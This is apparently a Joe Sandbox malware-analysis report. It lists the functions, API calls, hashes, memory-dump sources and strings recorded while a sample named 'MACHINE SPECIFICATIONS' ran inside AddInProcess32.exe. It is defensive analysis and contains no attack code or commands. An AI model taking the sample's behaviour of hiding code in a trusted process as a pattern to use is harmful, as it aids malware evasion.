Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c8cee0acfa896353822843c8b5216f277722dd5be9f6faf558237482d5ab4624
Instruction ID: 20dabf4de8b3683fdef49cf08129e4e8fc5f3431ec13c7a2fd609b6e780d9bca
Opcode Fuzzy Hash: c8cee0acfa896353822843c8b5216f277722dd5be9f6faf558237482d5ab4624
Instruction Fuzzy Hash: B141F272A18A8186E7218F25E4057ADF3A0FB88784F444232EA4DD7788EF7DD551C740

Function 00007FF6D38B6998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00007FF6D38B69E8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6D38B60CF), ref: 00007FF6D38B6A29

Strings

csm, xrefs: 00007FF6D38B6A16

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 7c93ce4a03b8982bd14bc8d52a55633aa190ccfb3290a1de9b2e76d048ba42fa
Instruction ID: 53cac0fb436ec3eccd1818a80468d7152b86a2d030d2f43983aec48e73838841
Opcode Fuzzy Hash: 7c93ce4a03b8982bd14bc8d52a55633aa190ccfb3290a1de9b2e76d048ba42fa
Instruction Fuzzy Hash: 16112B32618B8182EB218F25E44126DB7E4FB88B84F584232DACE5B765DF3DD561CB00

Analysis Process: AddInProcess32.exePID: 8564, Parent PID: 8548COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	5.6%
Signature Coverage:	2.5%
Total number of Nodes:	160
Total number of Limit Nodes:	13

Executed Functions

Function 00417AD3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
Instruction ID: 683b89875a7fb83d71da6e1f8a97b79be180c124f2fa609aa3b8b71e39b295bb
Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
Instruction Fuzzy Hash: F7011EB5E4420DBBDB10DAA5DC42FDEB378AB54308F4041AAE90897240F635EB588B95

Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA63

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
Instruction ID: 50a5b69ca1682e878e5a40afd65bd8ed1634e2dbd60f648430f8de340d975e9a
Opcode Fuzzy Hash: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
Instruction Fuzzy Hash: B5E08C763402147BE720FB5AEC42F9B776CDFC5710F10852AFA08A7281C6B4B90186F8

Function 014D34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014D34EA

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d69d86192e4b8e722fc8045f0880e984079d7137c797de01e7aea45cbaa257d1
Instruction ID: 9bd4880b89f04aec3c9bc0a92224f743e27b89b95b5155e01dbbceb9d877d21a
Opcode Fuzzy Hash: d69d86192e4b8e722fc8045f0880e984079d7137c797de01e7aea45cbaa257d1
Instruction Fuzzy Hash: 75900231A0510502D900625856187061045A7D0202F61C816A4414569DC7B5895175A2

Function 014D2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014D2BCA

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 205e713009b7680615cf8a1230c84a3df50a68077fadc12425f1c71fc332b446
Instruction ID: 5cd3ee911c045a7b88615d4c821fdcfecf086d2ffbbe099fbf9f4e21581d428a
Opcode Fuzzy Hash: 205e713009b7680615cf8a1230c84a3df50a68077fadc12425f1c71fc332b446
Instruction Fuzzy Hash: 8D90023160100502D9006698650C6460045A7E0302F51D416A9014556EC77588917131

Function 014D2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 014D2B9A

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b022c81d43eb4aa74e97550a1520267fbfd618c2f7381359f4a890e475002154
Instruction ID: 9efae907383352bf80105a5653d1f246f010f54b9caf6c316461a9cea9ef5b2c
Opcode Fuzzy Hash: b022c81d43eb4aa74e97550a1520267fbfd618c2f7381359f4a890e475002154
Instruction Fuzzy Hash: E590023160108902D9106258950874A0045A7D0302F55C816A8414659DC7B588917121

Function 014D2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 014D2A8A

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8feca12cd7eb6d4aa5dda12b2b3e4f5a9270914576c91b109333a05c93d7fea3
Instruction ID: 26cf2fd67e3bd0248a8d881b06aa3276ba9fd7cd8a73bf35f80ba05933b2cd00
Opcode Fuzzy Hash: 8feca12cd7eb6d4aa5dda12b2b3e4f5a9270914576c91b109333a05c93d7fea3
Instruction Fuzzy Hash: C290026160200103890572585518616404AA7E0202B51C426E5004591DC63588917125

Function 014D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014D2D1A

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46d74c810e92f5787961ddf642a55589094e1774033eba243938fdac8200b034
Instruction ID: 955f670a401c61dc89a4af9419d466fd019465217379de26e421bbb2de62b651
Opcode Fuzzy Hash: 46d74c810e92f5787961ddf642a55589094e1774033eba243938fdac8200b034
Instruction Fuzzy Hash: A990023160100513D911625856087070049A7D0242F91C817A4414559DD7768952B121

Function 014D2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014D2EBA

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 962e7b689ef8a331199ab874b4241b644e737636ad4e4b1a95749ca5e9985dc4
Instruction ID: 0762cb74a7e3e2635de49d2eecebdff1da14c483754ce4596759ee047138946d
Opcode Fuzzy Hash: 962e7b689ef8a331199ab874b4241b644e737636ad4e4b1a95749ca5e9985dc4
Instruction Fuzzy Hash: B590023160140502D9006258591870B0045A7D0303F51C416A5154556DC73588517571

Function 004142FB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A

Strings

b427-I_1, xrefs: 00414381, 00414384
b427-I_1, xrefs: 0041436F, 00414379, 0041438A

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: b427-I_1$b427-I_1
API String ID: 1836367815-3731361855
Opcode ID: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
Instruction ID: 1c1b804c52c0fa2fc79735cf8757f94194e925b2cf622f9804a62bf2283c9d4a
Opcode Fuzzy Hash: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
Instruction Fuzzy Hash: 4001A5B2D4111CBAEB119AD19D82DEFBB7CDF40398F00816AFA1467141D6784E468BA5

Function 00414303 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A

Strings

b427-I_1, xrefs: 00414381, 00414384
b427-I_1, xrefs: 0041436F, 00414379, 0041438A

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: b427-I_1$b427-I_1
API String ID: 1836367815-3731361855
Opcode ID: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
Instruction ID: 66382633165677f4d287f1c9305a2e0242bca7fee9ac24ed2ff299bc6a34d21b
Opcode Fuzzy Hash: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
Instruction Fuzzy Hash: 9401D6B2E4021CBADB10AAE19C82DEFBB7CDF40798F008169FA1467141D6785E068BB5

Function 004142CD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A

Strings

b427-I_1, xrefs: 00414381, 00414384
b427-I_1, xrefs: 0041436F, 00414379, 0041438A

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: b427-I_1$b427-I_1
API String ID: 1836367815-3731361855
Opcode ID: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
Instruction ID: e66581b55692d0f67d3645e7f83c5c9d5bac99b1c31a45c43741cea5d306e683
Opcode Fuzzy Hash: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
Instruction Fuzzy Hash: C301B5B2E4021CBADB119BD19C81DEFBB7CDF80398F00816AFA2467141D67C4E468BA5

Function 00417B83 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
Instruction ID: 5fe7b0e3159e894076f386ae4157a7bafd75539a6ed586e2fa135baba6e0e4fa
Opcode Fuzzy Hash: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
Instruction Fuzzy Hash: 7E21683192D2449FDB21CA75C9866E4BB74FB9A725F1406CBD091CF242D335AC8AC784

Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E8AE,?,?,00000000,?,0041E8AE,?,?,?), ref: 0042CD7B

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
Instruction ID: f9903ddc43aa1d478041010c95bd812e84ae6d930a69b2ca5004dc81876241ec
Opcode Fuzzy Hash: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
Instruction Fuzzy Hash: F3E092B1200204BBD710EF49EC41F9B77ACEFC5750F108419FD08A7241D670B910CAB8

Function 0042CD83 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B05C6C1,00000007,00000000,00000004,00000000,00417355,000000F4), ref: 0042CDBE

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
Instruction ID: 9d094757069ee7fafe8343a4ae1169e8157d0d769102895cf672c55cae1e0208
Opcode Fuzzy Hash: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
Instruction Fuzzy Hash: 7AE092B52002147BDB10EE4ADC41F9B33ACEFC5710F004419FD08A7241C6B0B9108AB8

Function 0042CDD3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,3D88789B,?,?,3D88789B), ref: 0042CE0A

Memory Dump Source

Source File: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
Instruction ID: 98d1125bebf2f9484b9d6ff066c81308abae10eb618a57f9fb154900a1da49d8
Opcode Fuzzy Hash: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
Instruction Fuzzy Hash: 40E04F7A2102147BD210BA5ADC01F97776CDFC5714F10446AFA1867241C6B17A01C6F4

Function 014D2B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 014D2B44

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f6574339b55b4dd1dc6c5d5c4d423b35f0070fa35d04c9dbc5b2ce0d5fd9508
Instruction ID: b66701fc0cae3e419dbd12dff5bde56dc90f3b6586d3226b1c9565917ffdbcf4
Opcode Fuzzy Hash: 6f6574339b55b4dd1dc6c5d5c4d423b35f0070fa35d04c9dbc5b2ce0d5fd9508
Instruction Fuzzy Hash: 82B09272D024C6CAEE12EB645B0CB1B7E40BBD0702F26C467E2460692F87B8C091F276

Non-executed Functions

Function 014C8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section address., xrefs: 0150530D
Critical section address, xrefs: 01505230, 015052C7, 0150533F
Thread is in a state in which it cannot own a critical section, xrefs: 0150534E
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01505215, 015052A1, 01505324
Address of the debug info found in the active list., xrefs: 015052B9, 01505305
Invalid debug info address of this critical section, xrefs: 015052C1
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015052ED
Critical section debug info address, xrefs: 0150522A, 01505339
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015052D9
double initialized or corrupted critical section, xrefs: 01505313
8, xrefs: 015050EE
undeleted critical section in freed memory, xrefs: 01505236
Thread identifier, xrefs: 01505345
corrupted critical section, xrefs: 015052CD

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 553f0adcd1c882a458fb3e6d412959e3aa142c52b0c556077d99d6c18b7a9d52
Instruction ID: 3f8eae25cffb42d95a8560137fd9d1b8ec68ff3c4de5c3d46253bc687e9d4902
Opcode Fuzzy Hash: 553f0adcd1c882a458fb3e6d412959e3aa142c52b0c556077d99d6c18b7a9d52
Instruction Fuzzy Hash: 60818E71A41349AFDB21CF99C945BEEBBB5FB08B10F20412EF945BB290D3B1A944CB50

Function 0148D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 0148D43D
@, xrefs: 0148D389
Control Panel\Desktop, xrefs: 0148D3FD
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0148D356
MachinePreferredUILanguages, xrefs: 0148D625
PreferredUILanguages, xrefs: 0148D458, 0148D465
PreferredUILanguagesPending, xrefs: 014EA66D
@, xrefs: 0148D603
Control Panel\Desktop\MuiCached, xrefs: 0148D5CB

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 9709ebcc7492593098eb517372053339e57d2dfcd470a6cc4a5511851ef0ea11
Instruction ID: c0776658d52e10dfc0fa47fd91eea761a27a0d978876603a19425f7f57e328ad
Opcode Fuzzy Hash: 9709ebcc7492593098eb517372053339e57d2dfcd470a6cc4a5511851ef0ea11
Instruction Fuzzy Hash: 1CB1AE719093529FCB21EF69C440A5FBBE8AF94704F05492FF989D73A0D770D9098BA2

Function 0148D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 0148D2B3
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0148D202
Control Panel\Desktop\LanguageConfiguration, xrefs: 0148D136
@, xrefs: 0148D09D
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0148D263
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0148D06F
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0148D0E6
@, xrefs: 0148D24F

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: c96323c149d7d491b8c901b48a5078ce5b52d5d863f4c21c7fb4a34908ee992f
Instruction ID: 81ca897fee047ad62f92a974f6ee3dcba49aa487b0a5ac5f40ea24b08237029b
Opcode Fuzzy Hash: c96323c149d7d491b8c901b48a5078ce5b52d5d863f4c21c7fb4a34908ee992f
Instruction Fuzzy Hash: 55A178B19083069FD721EF65C484B5FBBE8AF94719F10492FE688972A0D774D908CB93

Function 0153F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

Invalid CommitSize parameter - %Ix, xrefs: 0153F5B2
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 0153F5FB
HEAP[%wZ]: , xrefs: 0153F552, 0153F597, 0153F5E3, 0153F648, 0153F696, 0153F6DD
Invalid ReserveSize parameter - %Ix, xrefs: 0153F56B
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 0153F664
Specified HeapBase (%p) is free or not writable, xrefs: 0153F6F8
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 0153F6B2
HEAP: , xrefs: 0153F55F, 0153F5A4, 0153F5F0, 0153F655, 0153F6A3, 0153F6EA

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: c9d7eaab3791a73bd420eaaa50ee317f251e79b6def259e541665d72208041de
Instruction ID: 7e0df13ba8ad06a0e6786837d2215570a175f095f9abcdd318e3b7c908db7cd2
Opcode Fuzzy Hash: c9d7eaab3791a73bd420eaaa50ee317f251e79b6def259e541665d72208041de
Instruction Fuzzy Hash: D9512632A01246EFC712EF69C884E1EB7E8FF54A64F24885FF5059F271C675D940DA22

Function 0148F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(LONG)FreeEntry->Size > 1, xrefs: 014EE020
(!TrailingUCR), xrefs: 014EE138
HEAP[%wZ]: , xrefs: 014EDCE6, 014EDE2A, 014EE008, 014EE120
((LONG)FreeEntry->Size > 1), xrefs: 014EDE42
HEAP: , xrefs: 014EDCF3, 014EDE37, 014EE015, 014EE12D
(UCRBlock != NULL), xrefs: 014EDCFE

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: f370f00e53a47b9b8792b016dc5cf6e325fc08901207b84a5c476fda0a8ef40e
Instruction ID: 337a435354acab67be4832fb0da6ce26bd54219c915826e269f36decf90e8bb9
Opcode Fuzzy Hash: f370f00e53a47b9b8792b016dc5cf6e325fc08901207b84a5c476fda0a8ef40e
Instruction Fuzzy Hash: 4742EF316047429FC715EF29C888A2FBBE5FF98604F08496FE4958B362D734D94ACB52

Function 014AB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 014F8209
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 014F82DD
minkernel\ntdll\ldrutil.c, xrefs: 014F821A, 014F82EE
API set, xrefs: 014F8201, 014F8206
SxS, xrefs: 014F81FA
LdrpPreprocessDllName, xrefs: 014F8210, 014F82E4

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 1785501d97680736f77267bc6e6fed90ce3b0daea4d506d4ffee90e71002a620
Instruction ID: bcb2440484db4cb6882975557e2ad16b3f20f2edd1e77f82d057f997759e83b8
Opcode Fuzzy Hash: 1785501d97680736f77267bc6e6fed90ce3b0daea4d506d4ffee90e71002a620
Instruction Fuzzy Hash: D1C14831A002069BDB258B69C895BBFBB64EF75704F96416FEA029F3B1D770E845C390

Function 014C631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01504009
minkernel\ntdll\ldrinit.c, xrefs: 01503EF4, 01503F56, 0150401A, 01504074
Process initialization failed with status 0x%08lx, xrefs: 01503F45
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01503EE3
_LdrpInitialize, xrefs: 01503EEA, 01503F4C, 01504010, 0150406A
Delaying execution failed with status 0x%08lx, xrefs: 01504063

Memory Dump Source

Source File: 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1460000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 25ff75a5864d9330e9ab6d10b9dd17a4aea346c16b6f8efdb4f2c09b56e21238
Instruction ID: c9aff8e61b9979316918c446ef6ebec97277588529ba19f4a372a677b921dd9d
